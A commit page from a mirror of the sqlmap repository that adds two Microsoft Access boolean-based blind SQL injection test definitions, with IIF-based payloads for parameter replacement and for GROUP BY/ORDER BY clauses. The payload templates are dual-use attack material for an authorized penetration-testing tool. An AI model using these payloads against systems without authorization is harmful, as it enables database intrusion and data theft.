mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-04-27 04:13:45 +03:00
added some Microsoft Access payloads
This commit is contained in:
parent
3e8c204121
commit
08697e60a9
|
@ -727,7 +727,25 @@ Formats:
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<!-- TODO: check against Microsoft Access and SAP MaxDB -->
|
<test>
|
||||||
|
<title>Microsoft Access boolean-based blind - Parameter replace (original value)</title>
|
||||||
|
<stype>1</stype>
|
||||||
|
<level>3</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1,3</clause>
|
||||||
|
<where>3</where>
|
||||||
|
<vector>IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
|
||||||
|
<request>
|
||||||
|
<payload>IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<comparison>IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>Microsoft Access</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
<!-- TODO: check against SAP MaxDB -->
|
||||||
<!-- End of boolean-based blind tests - Parameter replace -->
|
<!-- End of boolean-based blind tests - Parameter replace -->
|
||||||
|
|
||||||
|
|
||||||
|
@ -842,7 +860,26 @@ Formats:
|
||||||
<dbms>Oracle</dbms>
|
<dbms>Oracle</dbms>
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
<!-- TODO: check against Microsoft Access and SAP MaxDB -->
|
|
||||||
|
<test>
|
||||||
|
<title>Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses</title>
|
||||||
|
<stype>1</stype>
|
||||||
|
<level>3</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>2,3</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>, IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
|
||||||
|
<request>
|
||||||
|
<payload>, IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<comparison>, IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>Microsoft Access</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
<!-- TODO: check against SAP MaxDB -->
|
||||||
<!-- End of boolean-based blind tests - GROUP BY and ORDER BY clauses -->
|
<!-- End of boolean-based blind tests - GROUP BY and ORDER BY clauses -->
|
||||||
|
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue
Block a user